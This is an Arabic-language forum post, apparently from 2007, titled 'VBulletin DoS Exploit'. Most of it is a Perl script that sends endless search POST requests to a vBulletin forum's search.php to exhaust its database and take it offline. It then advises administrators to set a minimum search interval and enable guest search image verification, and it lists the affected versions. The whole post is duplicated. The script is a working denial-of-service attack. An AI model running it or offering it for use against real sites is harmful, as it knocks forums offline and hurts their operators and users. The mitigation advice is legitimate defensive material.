i.s.s.w
25-07-2007, 10:56 PM
VBulletin DoS Exploit
السلام عليكم ورحمة الله وبركاته
الكلام الي تحت هو استغلال ثغره في ملف
search.php
فعاليت الثغره سبب الاجهاد للمنتدي وتنتهي في اغلاقة
الاستغلا ل تجدونة في قسم الاختراق وهنا وضعت الفكرا
#
#Perl ************************
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0;
$i<99999999999999999999999999999999999999999999999999 99999999999999999999;
$i++)
{
$user="h4x0r".$rand.$i;
$data =
"s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0
&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&
showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-**************: en-gb\r\n".
"*************-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)\r\n".
"Host: $host\r\n".
"*************-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
print "\th4x0r Security Team\n";
print "\twww.h4x0r.ir\n\n";
exit();
};
# Exploit By www.h4x0r.ir
الترقيع
اولا اذهب الى لوحت تحكم المنتدي --------- خيارات البحث في الموضوع
سوف تفتح لك الخيارات
كل ماعليك ضع في الخانه ((لوقت الأدنى بين عمليات البحث)) حط 10 بدل صفر او حسب خياراتك
ثاني شيء توجة الى الاسفل فعل خيار ((تحقق بصورة بحث الزائر)) ضع نعم
الاصدارات اللتي تحقق من فعاليت الثغره هي
3.6.5 وانت نازل
لم تلقى النجاح على 3.6.6 او 3.6.7 الاصليه من الشركة بسبب الخيار الافتراضي هو 30
اما منزوعه الكود تتأثر في العميله وتسبب ارهاق للقواعد البيانات ومن ثم التقفيل
الاتغلال كما ذكرنا عن طريق البيرل ومشروح من قبلي
وعليكم في تفعيل الخيارات لتفادي هجمات الهكر
وشكرا لكم
السلام عليكم ورحمة الله وبركاته
الكلام الي تحت هو استغلال ثغره في ملف
search.php
فعاليت الثغره سبب الاجهاد للمنتدي وتنتهي في اغلاقة
الاستغلا ل تجدونة في قسم الاختراق وهنا وضعت الفكرا
#
#Perl ************************
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0;
$i<99999999999999999999999999999999999999999999999999 99999999999999999999;
$i++)
{
$user="h4x0r".$rand.$i;
$data =
"s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0
&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&
showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-**************: en-gb\r\n".
"*************-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)\r\n".
"Host: $host\r\n".
"*************-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
print "\th4x0r Security Team\n";
print "\twww.h4x0r.ir\n\n";
exit();
};
# Exploit By www.h4x0r.ir
الترقيع
اولا اذهب الى لوحت تحكم المنتدي --------- خيارات البحث في الموضوع
سوف تفتح لك الخيارات
كل ماعليك ضع في الخانه ((لوقت الأدنى بين عمليات البحث)) حط 10 بدل صفر او حسب خياراتك
ثاني شيء توجة الى الاسفل فعل خيار ((تحقق بصورة بحث الزائر)) ضع نعم
الاصدارات اللتي تحقق من فعاليت الثغره هي
3.6.5 وانت نازل
لم تلقى النجاح على 3.6.6 او 3.6.7 الاصليه من الشركة بسبب الخيار الافتراضي هو 30
اما منزوعه الكود تتأثر في العميله وتسبب ارهاق للقواعد البيانات ومن ثم التقفيل
الاتغلال كما ذكرنا عن طريق البيرل ومشروح من قبلي
وعليكم في تفعيل الخيارات لتفادي هجمات الهكر
وشكرا لكم